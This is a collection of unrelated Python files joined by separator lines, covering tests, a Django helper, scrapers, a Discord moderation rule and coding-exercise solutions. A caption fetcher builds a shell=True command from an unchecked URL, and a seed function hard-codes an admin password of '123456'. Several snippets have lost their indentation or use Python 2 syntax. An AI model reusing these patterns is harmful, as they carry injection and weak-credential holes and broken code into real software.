if len(sys.argv) != 3:
print "Usage: python %s path_to_network_to_format result" % sys.argv[0]
else:
to_network(sys.argv[1], sys.argv[2])
|
"""Tests the `vlmd_submission_tools.subcommands.base.Subcommand` class"""
import unittest
from utils import captured_output
from vlmd_submission_tools.__main__ import main
from vlmd_submission_tools.subcommands import Subcommand
class TestSubcommand(unittest.TestCase):
    """Tests for the Subcommand base class, via a minimal concrete subclass."""

    class Example(Subcommand):
        """Minimal concrete Subcommand used as a test fixture."""
        @classmethod
        def __add_arguments__(cls, subparser):
            pass
        @classmethod
        def __main__(cls, options):
            pass
        @classmethod
        def __get_description__(cls):
            return "Example description"

    def test_get_name(self):
        # __tool_name__ defaults to the class name.
        self.assertEqual(TestSubcommand.Example.__tool_name__(), "Example")
        self.assertEqual(Subcommand.__tool_name__(), "Subcommand")

    def test_get_description(self):
        self.assertEqual(
            TestSubcommand.Example.__get_description__(), "Example description"
        )
        # The base class declares no description.
        self.assertIsNone(Subcommand.__get_description__())

    def test_no_inputs(self):
        # An unregistered subcommand name makes argparse exit with an error.
        with captured_output() as (_, stderr):
            with self.assertRaises(SystemExit):
                main(args=["Example"])
        # assertIn instead of assertTrue(x in y): reports both values on failure.
        self.assertIn("invalid choice: 'Example'", stderr.getvalue())

    def test_extra_subparser(self):
        # Registering the extra subparser makes the name valid, but unknown
        # flags still cause an argparse error exit.
        with captured_output() as (_, stderr):
            with self.assertRaises(SystemExit):
                main(args=["Example", "--fake"], extra_subparser=TestSubcommand.Example)
        self.assertIn("unrecognized arguments: --fake", stderr.getvalue())
|
from django.db.models import Sum, F, Value, DecimalField, ExpressionWrapper, CharField
from .models import *
def summaryTotals(proposalID):
    """Return the Security queryset restricted to the given proposal.

    Prefetches the draft-holding -> draft-account -> draft-portfolio ->
    proposal chain so iterating the result does not issue per-row queries.
    """
    summaryTotals = Security.objects.prefetch_related('relatedDraftHoldings__draftAccount__draftPortfolio__proposal')
    summaryTotals = summaryTotals.filter(
        relatedDraftHoldings__draftAccount__draftPortfolio__proposal = proposalID
    )
    return summaryTotals
def proposalLots(proposalID):
    """Return the DraftTaxLot queryset for the given proposal.

    select_related pulls the referenced lot in the same query;
    prefetch_related batches the holding -> account -> portfolio chain.
    (Removed a commented-out duplicate of the same query.)
    """
    proposalLots = DraftTaxLot.objects.filter(
        draftHolding__draftAccount__draftPortfolio__proposal_id=proposalID
    ).select_related('referencedLot').prefetch_related('draftHolding__draftAccount__draftPortfolio')
    return proposalLots
|
'''
Created on Jun 1, 2016
@author: pedrom
'''
import subprocess
from os import listdir, remove
from os.path import isfile, join
def get_captions(youtube_url):
    """Fetch English captions for *youtube_url* via youtube-dl.

    Tries both the auto-generated (ASR) and the manually-authored caption
    tracks; whichever downloads successfully is included in the returned
    dict under "cap_asr" / "cap_man" respectively.
    """
    print("Getting captions for " + youtube_url)
    ret_dic = {}
    argsCapASR = "--write-auto-sub --sub-lang en --skip-download -o cap_asr.txt"
    cap_asr_str = run_youtube_dl(argsCapASR, "cap_asr", youtube_url)
    # Idiom fix: `is not None` instead of `not x == None`.
    if cap_asr_str is not None:
        ret_dic["cap_asr"] = cap_asr_str
    argsManASR = "--write-sub --sub-lang en --skip-download -o cap_manual.txt"
    cap_manual_str = run_youtube_dl(argsManASR, "cap_manual", youtube_url)
    if cap_manual_str is not None:
        ret_dic["cap_man"] = cap_manual_str
    return ret_dic
def run_youtube_dl(args, outF, youtube_url):
    """Run youtube-dl with *args*, then read and delete the first file in
    the current directory whose name starts with *outF*.

    Returns the caption file's text, or None when no matching file was
    produced.

    NOTE(review): the youtube-dl path is hard-coded for one Windows
    machine, and shell=True with string concatenation is unsafe if
    youtube_url ever contains shell metacharacters — confirm the URL is
    trusted before reuse.
    """
    command = "C:\Python34\Scripts\youtube-dl " + args + " " + youtube_url
    p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    # Drain youtube-dl's combined stdout/stderr (content is discarded;
    # draining avoids the pipe filling up before wait()).
    result = ""
    for line in p.stdout.readlines():
        result += str(line)
    retval = p.wait()
    all_files = [f for f in listdir(".") if isfile(join(".", f))]
    cap_str = None
    for file in all_files:
        if file.startswith(outF):
            with open(file, encoding="utf8") as cap_asr_file:
                cap_str = cap_asr_file.read()
            # Clean up the downloaded caption file and return on the
            # first match.
            remove(file)
            return cap_str
    return None
|
import discord
from .base import BaseRule
from ..utils import *
import logging
import re
log = logging.getLogger("red.breadcogs.automod")
class MentionSpamRule(BaseRule):
    """Automod rule that flags messages containing too many user mentions.

    The per-guild threshold is stored in config under
    ("settings", "mention_threshold") and defaults to 4 when unset.
    """
    def __init__(
        self, config,
    ):
        super().__init__(config)
        self.name = "mentionspam"

    @staticmethod
    async def mentions_greater_than_threshold(
        message_content: str, allowed_mentions: list, threshold: int
    ):
        """Return True when the message contains *threshold* or more user
        mentions, ignoring any whitespace-separated token that appears in
        *allowed_mentions*. (Note: despite the name, the comparison is >=.)
        """
        content_filtered = [
            word for word in message_content.split() if word not in allowed_mentions
        ]
        # Discord user-mention markup: <@123...> or <@!123...>.
        mention = re.compile(r"<@!?(\d+)>")
        mention_count = len(list(filter(mention.match, content_filtered)))
        return mention_count >= threshold

    async def is_offensive(
        self, message: discord.Message,
    ):
        """Return True when *message* exceeds the guild's mention threshold.

        Self-mentions by the author are always allowed.
        """
        try:
            mention_threshold = await self.config.guild(message.guild).get_raw(
                "settings", "mention_threshold",
            )
        except KeyError:
            # No per-guild setting stored yet: fall back to the default.
            mention_threshold = 4
        allowed_mentions = [message.author.mention]
        return await self.mentions_greater_than_threshold(
            message.content, allowed_mentions, mention_threshold
        )

    async def set_threshold(
        self, ctx, threshold,
    ):
        """Persist a new mention threshold for the guild and return the
        (before, after) pair for confirmation messages."""
        guild = ctx.guild
        before = 4
        try:
            before = await self.config.guild(guild).get_raw("settings", "mention_threshold",)
        except KeyError:
            # First time the threshold is set for this guild.
            pass
        await self.config.guild(guild).set_raw(
            "settings", "mention_threshold", value=threshold,
        )
        log.info(
            f"{ctx.author} ({ctx.author.id}) changed mention threshold from {before} to {threshold}"
        )
        return (
            before,
            threshold,
        )
|
def getNewCookie(_id: int, _nume: str, _descriere: str, _pret: int, _calorii: int, _in_menu_since: int):
    """Build and return a cookie record as a plain dict.

    Keys: id, nume (name), descriere (description), pret (price),
    calorii (calories), in_menu_since (year added to the menu).
    """
    keys = ('id', 'nume', 'descriere', 'pret', 'calorii', 'in_menu_since')
    values = (_id, _nume, _descriere, _pret, _calorii, _in_menu_since)
    return dict(zip(keys, values))
def get_id(prajitura):
    """Return the cookie's numeric id."""
    return prajitura['id']


def get_name(prajitura):
    """Return the cookie's name ('nume')."""
    return prajitura['nume']


def get_description(prajitura):
    """Return the cookie's description ('descriere')."""
    return prajitura['descriere']


def get_price(prajitura):
    """Return the cookie's price ('pret')."""
    return prajitura['pret']


def get_calories(prajitura):
    """Return the cookie's calorie count ('calorii')."""
    return prajitura['calorii']


def get_in_menu_since(prajitura):
    """Return the year the cookie entered the menu ('in_menu_since')."""
    return prajitura['in_menu_since']


def get_cookie_string(prajitura):
    """Return a one-line human-readable (Romanian) summary of the cookie."""
    return (
        f'Prajitura cu id-ul {get_id(prajitura)}, '
        f'introdusa in anul {get_in_menu_since(prajitura)}, '
        f'cu numele {get_name(prajitura)}'
    )
# conding = utf-8
from selenium import webdriver
import time
import json
class DouyuSpider:
    """Selenium-driven scraper for the douyu.com live-room directory.

    Walks every directory page, extracts per-room metadata, and appends
    each record as JSON to douyu.txt.

    NOTE(review): find_elements_by_xpath was removed in Selenium 4 —
    confirm the pinned Selenium version before reuse; the chromedriver
    path is hard-coded for one Windows machine.
    """
    def __init__(self):
        self.start_url = "https://www.douyu.com/directory/all"
        self.driver = webdriver.Chrome(r"F:\chromedriver.exe")

    def get_content_list(self):
        """Scrape the current page; return (room dicts, next-page element
        or None when on the last page)."""
        li_list = self.driver.find_elements_by_xpath("//ul[@class='layout-Cover-list']/li")
        content_list = []
        for li in li_list:
            item = {}
            item["room_img"] = li.find_element_by_xpath(".//div[@class='DyListCover-imgWrap']//img").get_attribute("src")
            item["room_title"] = li.find_element_by_xpath(".//div[@class='DyListCover-content']//h3").get_attribute("title")
            item["room_cate"] = li.find_element_by_xpath(".//div[@class='DyListCover-content']//span[@class='DyListCover-zone']").text
            item["author_name"] = li.find_element_by_xpath(".//div[@class='DyListCover-content']//h2").text
            item["watch_num"] = li.find_element_by_xpath(".//div[@class='DyListCover-info'][2]/span").text
            print(item)
            content_list.append(item)
        # Locate the "next page" pagination element (absent on the last page).
        next_url = self.driver.find_elements_by_xpath("//ul[@class='dy-Pagination ListPagination']//li[@class=' dy-Pagination-next']")
        print(next_url)
        next_url = next_url[0] if len(next_url) > 0 else None
        return content_list,next_url

    def save_content_list(self,content_list):
        """Append each scraped room record to douyu.txt as pretty-printed JSON."""
        with open("douyu.txt","a",encoding="utf-8") as f:
            for content in content_list:
                f.write(json.dumps(content,ensure_ascii=False,indent=2))
                f.write("\n")
            print("写入成功!")

    def run(self):
        """Main loop: load the directory, then scrape/save page by page."""
        # 1. start_url
        # 2. Request the page and wait for it to render.
        self.driver.get(self.start_url)
        # 3. Extract the data and the next-page element.
        time.sleep(10)
        content_list,next_url = self.get_content_list()
        # 4. Save the data.
        self.save_content_list(content_list)
        # 5. Click through to each following page and repeat.
        while next_url is not None:
            next_url.click()
            time.sleep(10)
            content_list,next_url = self.get_content_list()
            self.save_content_list(content_list)
if __name__ == "__main__":
douyu = DouyuSpider()
douyu.run()
|
from layers.domain_layer.user_aggregate import Regulator
from layers.domain_layer.repositories import UserRepository
def Generate_Regulator():
    """Create the default regulator account, persist it, and return its id.

    SECURITY NOTE(review): the credentials ("admin" / "123456") are
    hard-coded — this looks like a development/seed fixture; confirm it is
    never executed against a production user store.
    """
    regulator = Regulator("admin","admin@admin.com","88888888","Mr Regulator","123456")
    UserRepository().add(regulator)
    return regulator.id
|
import yaml
import os
class YAML:
    """Thin read-only wrapper around a YAML config file.

    The file is resolved relative to the current working directory and
    parsed once at construction time.
    """
    def __init__(self, filename=None):
        # Fixed private-attribute typo: __filenane -> __filename.
        self.__filename = filename
        self.__config_path = os.path.join(os.curdir, self.__filename)
        self.__config = self.__load_config()

    def __load_config(self):
        """Parse and return the YAML file's contents.

        The original wrapped this in `except Exception as e: raise e`,
        which is a no-op; errors (missing file, bad YAML) now simply
        propagate with their original tracebacks.
        """
        with open(self.__config_path) as f:
            return yaml.safe_load(f)

    def get_config(self, name):
        """Return the top-level entry *name* (raises KeyError if absent)."""
        return self.__config[name]

    def get_all_data(self):
        """Return the entire parsed configuration object."""
        return self.__config
def main(service_file,nodes_file,service_name):
    """Look up *service_name* in the services file and print the config of
    each node it lists, taken from the nodes file."""
    service_config=YAML(service_file)
    nodes_config=YAML(nodes_file)
    # The service entry is expected to be a list of node names.
    nodes=service_config.get_config(service_name)
    for node in nodes:
        print(nodes_config.get_config(node))

# Script entry point: resolve service "servicea" against the default files.
if __name__ == '__main__':
    main("services","nodes","servicea")
"""
15. 3Sum
Medium
19433
1856
Add to List
Share
Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.
Notice that the solution set must not contain duplicate triplets.
Example 1:
Input: nums = [-1,0,1,2,-1,-4]
Output: [[-1,-1,2],[-1,0,1]]
Explanation:
nums[0] + nums[1] + nums[1] = (-1) + 0 + 1 = 0.
nums[1] + nums[2] + nums[4] = 0 + 1 + (-1) = 0.
nums[0] + nums[3] + nums[4] = (-1) + 2 + (-1) = 0.
The distinct triplets are [-1,0,1] and [-1,-1,2].
Notice that the order of the output and the order of the triplets does not matter.
Example 2:
Input: nums = [0,1,1]
Output: []
Explanation: The only possible triplet does not sum up to 0.
Example 3:
Input: nums = [0,0,0]
Output: [[0,0,0]]
Explanation: The only possible triplet sums up to 0.
Constraints:
3 <= nums.length <= 3000
-105 <= nums[i] <= 105
"""
from typing import List
from collections import defaultdict
class Solution:
    def threeSum(self, nums: List[int]) -> List[List[int]]:
        """Return all unique triplets from nums that sum to zero.

        Canonical sort + two-pointer scan: O(n^2) time, O(1) extra space.
        (The original built an O(n^2)-memory dictionary of all pair sums
        with ad-hoc duplicate-skipping conditions; this rewrite produces
        the same set of triplets — output order is not significant per the
        problem statement.)
        """
        nums = sorted(nums)
        n = len(nums)
        triplets: List[List[int]] = []
        for i in range(n - 2):
            # Skip duplicate anchor values to avoid duplicate triplets.
            if i > 0 and nums[i] == nums[i - 1]:
                continue
            # Array is sorted: once the anchor is positive no triplet
            # containing it can sum to zero.
            if nums[i] > 0:
                break
            lo, hi = i + 1, n - 1
            while lo < hi:
                total = nums[i] + nums[lo] + nums[hi]
                if total < 0:
                    lo += 1
                elif total > 0:
                    hi -= 1
                else:
                    triplets.append([nums[i], nums[lo], nums[hi]])
                    lo += 1
                    hi -= 1
                    # Skip duplicates of the two matched values.
                    while lo < hi and nums[lo] == nums[lo - 1]:
                        lo += 1
                    while lo < hi and nums[hi] == nums[hi + 1]:
                        hi -= 1
        return triplets
|
# Read a permutation `a` of 1..n and print its inverse: for each value
# i in 1..n, print the 1-based position at which i occurs in `a`
# (space-separated, with a trailing space, then a newline).
n = int(input())
a = list(map(int, input().split()))
positions = {value: index for index, value in enumerate(a, start=1)}
for value in range(1, n + 1):
    print(positions[value], end=' ')
print()
|
"""
This module will query the OWL Ontology based on a user's inputted genre to
select a set of instruments as midi program integers
"""
import owlready2 as owl
from music21 import instrument
def load_ontology():
    """Load and return the project's root OWL ontology from the working
    directory (file name 'root-ontology.owl')."""
    return owl.get_ontology("root-ontology.owl").load()
def get_genre_map(ontology):
    """Map consecutive integer keys (0, 1, ...) to every MusicalGenre
    individual found in *ontology*.

    Uses enumerate instead of the original hand-rolled counter; the
    key order follows the ontology's search order.
    """
    return {
        key: individual
        for key, individual in enumerate(ontology.search(type=ontology.MusicalGenre))
    }
def get_instruments(genre, ontology):
    """Return MIDI program numbers for a small band matching the given genre.

    genre: an ontology individual whose label[0] names the genre.
    Unknown genre labels yield an empty list. (`ontology` is currently unused.)
    """
    genre_bands = {
        "Blues": (instrument.AcousticGuitar, instrument.Harmonica,
                  instrument.TomTom),
        "Folk": (instrument.Banjo, instrument.AcousticBass,
                 instrument.Piano),
        "Rock": (instrument.ElectricGuitar, instrument.ElectricBass,
                 instrument.BassDrum),
        "Classical": (instrument.Violin, instrument.Oboe,
                      instrument.Flute, instrument.Viola),
        "Country": (instrument.AcousticGuitar, instrument.Banjo,
                    instrument.TomTom),
    }
    band = genre_bands.get(genre.label[0], ())
    return [maker().midiProgram for maker in band]
|
# Problem 1209. 1, 10, 100, 1000...
# http://acm.timus.ru/problem.aspx?space=1&num=1209
# See the sequence
# 1
# 10
# 100
# 1000
# 10000
# 100000
# We get '1' after a '0' increased
# The sequence of getting '1' is 1,2,4,7,11,16 and so on
# if we multiply a number by 8 and subtract 7, and the result
# can be square-rooted without getting a fractional value,
# then the digit at that position is 1.
# like (8*7)-7 = 56-7 = 49
# √49 = 7.0
# so we get no fractional part
from math import modf,sqrt
def checkOne(num):
    """Return '1 ' if position num of the sequence 110100100010000... holds a 1.

    Ones sit at positions 1, 2, 4, 7, 11, 16, ... (k*(k-1)/2 + 1), i.e.
    exactly when 8*num - 7 is a perfect square. The original tested
    modf(sqrt(m)) == 0, which trusts the float sqrt to be exact; rounding
    the root and verifying in integer arithmetic is robust.
    """
    m = 8 * num - 7
    root = round(sqrt(m))  # round, then confirm exactly with integers
    return '1 ' if root * root == m else '0 '
# Read the query count, then answer each query on one space-separated line.
queries = int(input())
answers = [checkOne(int(input())) for _ in range(queries)]
result = ''.join(answers)
print(result.lstrip())
__author__ = 'Chaithra'
from listutils import *
#
notes = """
This is to make you familiar with linked list structures usage in python
see the listutils.py module for some helper functions
"""
class Node:
    """A singly linked list node: a value plus a reference to the next node."""

    def __init__(self, value=None):
        self.value = value  # payload carried by this node
        self.next = None    # successor node, or None at the tail
#given the head of a list,
# reverse the list and return the head of the reversed list
def reverse_linked_list(head):
    """Reverse the linked list starting at head.

    Returns the reversed content as a plain Python list (via
    listutils.from_linked_list) rather than the new head node -- the tests
    below rely on that.

    Fix: the original allocated a throwaway dummy `Node()` that was never
    used; it is removed here.
    """
    reversed_head = None
    while head is not None:
        # unlink the current node and push it onto the front of the result
        node = head
        head = head.next
        node.next = reversed_head
        reversed_head = node
    return from_linked_list(reversed_head)
#write test cases covering all cases for your solution
def test_reverse_linked_list():
    """Cover a multi-element list, the empty list, and a single element."""
    cases = [
        ([1, 2, 3, 4], [4, 3, 2, 1]),
        ([], []),
        ([0], [0]),
    ]
    for source, expected in cases:
        assert reverse_linked_list(to_linked_list(source)) == expected
|
from PyObjCTools.TestSupport import *
import CoreWLAN
class TestCWNetwork (TestCase):
    """Checks that CWNetwork methods declare BOOL return types."""

    @min_os_level('10.7')
    def test_methods10_7(self):
        # Bug fix: the original defined two methods both named
        # test_methods10_7; the second silently shadowed the first, so the
        # `ibss` check was never executed. All 10.7 checks now live here.
        self.assertResultIsBOOL(CoreWLAN.CWNetwork.ibss)
        self.assertResultIsBOOL(CoreWLAN.CWNetwork.supportsSecurity_)
        self.assertResultIsBOOL(CoreWLAN.CWNetwork.supportsPHYMode_)

    @min_os_level('10.6')
    def test_methods10_6(self):
        self.assertResultIsBOOL(CoreWLAN.CWNetwork.isEqualToNetwork_)
        self.assertResultIsBOOL(CoreWLAN.CWNetwork.isIBSS)
if __name__ == "__main__":
    # PyObjCTools.TestSupport.main() discovers and runs the TestCase above.
    main()
|
from turtle import Turtle,Screen
import random
import turtle as t
# COLORS = [(236, 235, 230), (239, 228, 234), (223, 240, 231), (227, 232, 241), (240, 37, 113), (146, 25, 72), (218, 161, 64), (14, 144, 88), (239, 73, 35), (186, 169, 36), (29, 127, 193), (56, 190, 230), (245, 220, 53), (178, 42, 102), (35, 175, 119), (129, 189, 104), (78, 27, 81), (209, 62, 28), (251, 226, 0), (146, 31, 26)]
#tim = Turtle()
# def random_color():
# return random.choice(COLORS)
# tim.dot(20,random_color())
tim = t.Turtle()
t.colormode(255)  # accept 0-255 RGB tuples instead of 0.0-1.0 floats

# Three predefined dark colours to choose from.
COLORS = [(139, 0, 0),
          (0, 100, 0),
          (0, 0, 139)]

def random_color():
    """Pick one of the predefined RGB colours at random."""
    return random.choice(COLORS)

# Stamp three 20-pixel dots, each in a randomly chosen colour.
for _ in range(3):
    tim.dot(20, random_color())

screen = Screen()
screen.exitonclick()
import numpy as np
import scipy.sparse as sp
import argparse
import random
# Global cache mapping node_type -> number of nodes of that type
# (populated lazily by gen_nodes_map below).
nodes_map = {
}
def read_dat(path, file_name):
    """Load a tab-separated integer matrix from path + file_name.

    `path` is expected to end with a path separator (callers normalise it).
    Fix: `np.int` was deprecated in NumPy 1.20 and removed in 1.24; the
    builtin `int` is the documented replacement and behaves identically here.
    """
    full_path = path + file_name
    return np.loadtxt(full_path, delimiter='\t', dtype=int)
def gen_nodes_map(path, node_type):
    """Record the node count for node_type in the module-level nodes_map cache.

    The <node_type>.txt file is read unconditionally (matching the original),
    but an existing cache entry is never overwritten.
    """
    data = read_dat(path=path, file_name="%s.txt" % node_type)
    nodes_map.setdefault(node_type, len(data))
def encode_onehot(labels):
    """One-hot encode labels into an int32 array of shape (len(labels), n_classes).

    Fix: classes are sorted so column order is deterministic across runs --
    iterating a raw set is order-unstable (e.g. under string hash
    randomisation), which made the column layout irreproducible.
    """
    classes = sorted(set(labels))
    classes_dict = {c: np.identity(len(classes))[i, :]
                    for i, c in enumerate(classes)}
    return np.array([classes_dict[label] for label in labels],
                    dtype=np.int32)
def gen_labels(target_type, label_file, ispart=True, input_dir='./', output_dir='./'):
    """Write <target>.label.all and <target>.label.part from the label file.

    The label file has one "<node_idx><TAB><label_idx>" row per node, where
    label 0 marks an unlabelled node. The .all file gets every label (one per
    line); the .part file gets "<node_idx><TAB><label_idx>" rows restricted to
    labelled nodes when ispart is True, or all rows otherwise.
    """
    labels = read_dat(path=input_dir, file_name=label_file)
    if ispart:
        labels_part = [row for row in labels if row[1] != 0]
    else:
        labels_part = list(labels)
    with open(output_dir + '%s.label.all' % target_type, 'w') as fall:
        fall.writelines('{}\n'.format(row[1]) for row in labels)
    with open(output_dir + '%s.label.part' % target_type, 'w') as fpart:
        fpart.writelines('{}\t{}\n'.format(row[0], row[1]) for row in labels_part)
def label_feature(path, output_path, node_type, target_type, ispart):
    """Build a sparse label-based feature matrix for node_type and save as .npz.

    For the target type the features are the one-hot encoded labels; for any
    other type an all-zero matrix of matching class width is emitted.
    """
    labels = np.loadtxt(path, delimiter='\t', dtype=np.dtype(str))
    # minus one for the "no label" class 0
    class_num = len(set(list(labels))) - 1
    if node_type == target_type:
        feat = encode_onehot(labels)
        if ispart:
            # Drop the column for the unlabelled class.
            # NOTE(review): this assumes that class occupies the first
            # column of the one-hot encoding -- verify against encode_onehot.
            feat = feat[:, 1:]
        feat = sp.csr_matrix(feat)
    else:
        entity_n = nodes_map[node_type]
        feat = sp.csr_matrix(np.zeros([entity_n, class_num]))
    sp.save_npz(output_path, feat)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="your script description")
    parser.add_argument('--target-type', type=str)
    parser.add_argument('--node-list', type=str)
    parser.add_argument('--label-file', type=str)
    parser.add_argument('--ispart', type=str)
    parser.add_argument('--input-dir', type=str)
    parser.add_argument('--output-dir', type=str)
    args = parser.parse_args()
    target_type = args.target_type
    # argparse delivers strings, so the boolean flag is compared textually.
    ispart = True if args.ispart == 'True' else False
    # Normalise both directories to end with '/'.
    input_dir = args.input_dir + '/' if args.input_dir[-1] != '/' else args.input_dir
    output_dir = args.output_dir + '/' if args.output_dir[-1] != '/' else args.output_dir
    # First write the label files, then a feature matrix per node type.
    gen_labels(target_type=target_type, label_file=args.label_file, ispart=ispart,
               input_dir=input_dir, output_dir=output_dir)
    node_types = args.node_list.split(',')
    for node_type in node_types:
        gen_nodes_map(path=input_dir, node_type=node_type)
        label_feature(path=output_dir + '%s.label.all' % target_type,
                      output_path=output_dir + '%s.feat.label' % node_type,
                      node_type=node_type,
                      target_type=target_type, ispart=ispart)
|
def dictionary(openfile):
    """Print "word count" for each whitespace-separated word in the file.

    Words are counted in first-seen order. Returns None -- the function's
    purpose is its printed output.

    Fix: the original opened the file and never closed it; a with-statement
    guarantees the handle is released.
    """
    word_counts = {}
    with open(openfile) as lines:
        for line in lines:
            for word in line.rstrip().split():
                word_counts[word] = word_counts.get(word, 0) + 1
    for word, count in word_counts.items():
        print(word, count)
print(dictionary("test.txt"))
|
# Advent of Code 2020 day 10: adapter joltage chains.
print('Part 1')
list=[0]
for line in open('input.txt'):
    list.append(int(line.split('\n')[0]))
sortd=sorted(list)
i=0
# Both counters start at 1: the final jump to the device is always +3, and
# the chain implicitly starts at the outlet (joltage 0) already in the list.
counter1=1
counter3=1
while i<(len(sortd)-1):
    if sortd[i+1]-sortd[i]==1:
        counter1=counter1+1
    if sortd[i+1]-sortd[i]==3:
        counter3=counter3+1
    i=i+1
print(counter1*counter3)
print('Part 2')
# I added "195" to the list
count = len(open('input.txt').readlines( ))
def FindNeighbours(i):
    # Return (as strings) the adapters strictly after i in sorted order that
    # are reachable from i, i.e. at most 3 jolts higher.
    index=sortd.index(i)
    #find neighbours in the list that are not part of the earlier numbers
    result=[]
    j=index+1
    while j<count+1:
        k=sortd[j]
        #this finds the neighbours
        if not i==k and abs(i-k)<=3:
            result.append(str(k))
        j=j+1
    return result
# possibilities maps a ':'-joined suffix of a partial chain to the number of
# distinct chains ending in that suffix; '195' is presumably the highest
# adapter in this specific input -- TODO confirm against input.txt.
possibilities={'0':1}
a=0
counter=0
finalcombo={}
while a<count:
    start={}
    for combo in possibilities:
        # last number, previous numbers and new possibilites to carry on the string
        lastnumber=combo.split(':')[-1]
        newletters = FindNeighbours(int(lastnumber))
        if not newletters==[]:
            if not newletters==['195']:
                for poss in newletters:
                    #if there are new items to append&we haven't reached the end, create a new start array
                    if combo.count(':')>5:
                        #no need to have stupidly long strings
                        shortercombo=':'.join(combo.split(':')[1:])
                        newcombo=shortercombo+':'+poss
                        if newcombo in start:
                            start[newcombo]=start[newcombo]+possibilities[combo]
                        else:
                            start[newcombo]=possibilities[combo]
                    else:
                        start[combo+':'+poss]=possibilities[combo]
            else:
                # Only the final adapter is reachable: this chain is complete.
                if combo in finalcombo:
                    finalcombo[combo]=finalcombo[combo]+possibilities[combo]
                else:
                    finalcombo[combo]=possibilities[combo]
    possibilities=start
    a=a+1
# Sum the multiplicities of all completed chains.
summed=0
for item in finalcombo:
    summed=summed+finalcombo[item]
print("Answer:",summed)
#print(sortd)
|
#Import the json library
import json
'''
Two important json methods for json.dump and json.dumps
json.dump ==> to dump a python object into a text file in json format
json.dumps ==> to convert a python object into string representation of the json format.
'''
friend1 = {"Raunaq": [24, "India"]}
friend2 = {"Milony": [25, "United States"]}
# A tuple serialises as a JSON array (tuples have no JSON equivalent).
friends = (friend1, friend2)
'''SERIALIZATION'''
# Write the tuple of dicts to friends.json, pretty-printed with 4-space indent.
with open('friends.json', 'w') as file:
    json.dump(friends, file, indent=4)
print (json.dumps(friends, indent = 4))
'''DESERIALIZATION'''
'''
Two important methods used for deserialization are
json.load and json.loads
json.load ==> is used to take convert the json format to a python object
json.loads ==> is used to just converted the string representation json to the python object.
JSON doesn't support all of the python data types
Doesnt support set at all, and converts a list or tuple to an array. Dictionary becomes a json object. True to true, False to false, None to null, etc.
'''
# Read the file back: the JSON array comes back as a Python list of dicts.
with open('friends.json') as file:
    content = json.load(file)
print (content)
content_string = """
[
    {
        "Raunaq": [
            24,
            "India"
        ]
    },
    {
        "Milony": [
            25,
            "United States"
        ]
    }
]
"""
print (json.loads(content_string))
#DISCLAIMER: MAKE SURE YOU NOTICE THAT THE TUPLE HAS BEEN CONVERTED TO AN ARRAY BY JSON
|
def alphabetize(thisString):
    """Return the characters of thisString sorted into ascending order.

    Bug fix: the original called newString.join(...) and discarded the
    result (str.join does not mutate), so it always returned ''.
    """
    return ''.join(sorted(thisString))
def anagram(aString, bString):
    """Return True if the two strings are anagrams of each other."""
    if len(aString) != len(bString):
        return False
    # Anagrams contain exactly the same characters, so their sorted
    # (alphabetized) forms are equal; return the comparison directly
    # instead of the original if/else returning True/False.
    return alphabetize(aString) == alphabetize(bString)
# NOTE(review): `print a` is Python 2 statement syntax -- this demo section
# will not run under Python 3 without converting each line to print(a).
a = anagram("dad","add")
print a
a = anagram("bad","add")
print a
a = anagram("ddad","add")
print a
a = anagram("ohmygodicantbelieveit","ogeodilycantbmievheit")
print a
a = anagram("herp","suckit")
print a
a = anagram("david","divad")
print a
|
import nengo
import numpy as np
import pytest
from nengo.exceptions import BuildError
from nengo_loihi.builder import Model
from nengo_loihi.neurons import nengo_rates
@pytest.mark.parametrize("tau_ref", [0.001, 0.003, 0.005])
def test_lif_response_curves(tau_ref, Simulator, plt):
    """On-chip LIF spike counts must lie between the ideal rates computed
    for tau_ref and tau_ref + dt (one-timestep discretisation bracket),
    with a tolerance of one spike."""
    n = 256
    encoders = np.ones((n, 1))
    gain = np.zeros(n)
    bias = np.linspace(1, 30, n)
    with nengo.Network() as model:
        a = nengo.Ensemble(
            n,
            1,
            neuron_type=nengo.LIF(tau_ref=tau_ref),
            encoders=encoders,
            gain=gain,
            bias=bias,
        )
        ap = nengo.Probe(a.neurons)
    dt = 0.001
    with Simulator(model, dt=dt) as sim:
        sim.run(1.0)
    # spikes per neuron over 1 s of simulation
    scount = np.sum(sim.data[ap] > 0, axis=0)

    def rates(tau_ref, gain=gain, bias=bias):
        # reference firing rates from the ideal (continuous-time) LIF model
        lif = nengo.LIF(tau_ref=tau_ref)
        return nengo_rates(lif, 0.0, gain, bias).squeeze(axis=0)

    upper_bound = rates(tau_ref=tau_ref)
    lower_bound = rates(tau_ref=tau_ref + dt)
    mid = rates(tau_ref=tau_ref + 0.5 * dt)
    plt.title("tau_ref=%.3f" % tau_ref)
    plt.plot(bias, upper_bound, "k")
    plt.plot(bias, lower_bound, "k")
    plt.plot(bias, mid, "b")
    plt.plot(bias, scount, "g", label="Spike count on Loihi")
    plt.xlabel("Bias current")
    plt.ylabel("Firing rate (Hz)")
    plt.legend(loc="best")
    assert scount.shape == upper_bound.shape == lower_bound.shape
    assert np.all(scount <= upper_bound + 1)
    assert np.all(scount >= lower_bound - 1)
def test_relu_response_curves(Simulator, plt, allclose):
    """On-chip spiking rectified-linear spike counts must match the ideal
    rate curve to within 5 spikes."""
    n = 256
    encoders = np.ones((n, 1))
    gain = np.zeros(n)
    bias = np.linspace(0, 50, n)
    with nengo.Network() as model:
        a = nengo.Ensemble(
            n,
            1,
            neuron_type=nengo.SpikingRectifiedLinear(),
            encoders=encoders,
            gain=gain,
            bias=bias,
        )
        ap = nengo.Probe(a.neurons)
    dt = 0.001
    t_final = 1.0
    with Simulator(model, dt=dt) as sim:
        sim.run(t_final)
    # spikes per neuron over t_final seconds
    scount = np.sum(sim.data[ap] > 0, axis=0)
    actual = nengo.SpikingRectifiedLinear().rates(0.0, gain, bias)
    plt.plot(bias, actual, "b", label="Ideal")
    plt.plot(bias, scount, "g", label="Loihi")
    plt.xlabel("Bias current")
    plt.ylabel("Firing rate (Hz)")
    plt.legend(loc="best")
    assert allclose(actual, scount, atol=5)
@pytest.mark.parametrize("amplitude", (0.1, 0.5, 1))
@pytest.mark.parametrize("neuron_type", (nengo.SpikingRectifiedLinear, nengo.LIF))
def test_amplitude(Simulator, amplitude, neuron_type, seed, plt, allclose):
    """Neuron amplitude must scale spike heights (amplitude/dt), decoded
    values, and downstream neuron-to-neuron drive consistently."""
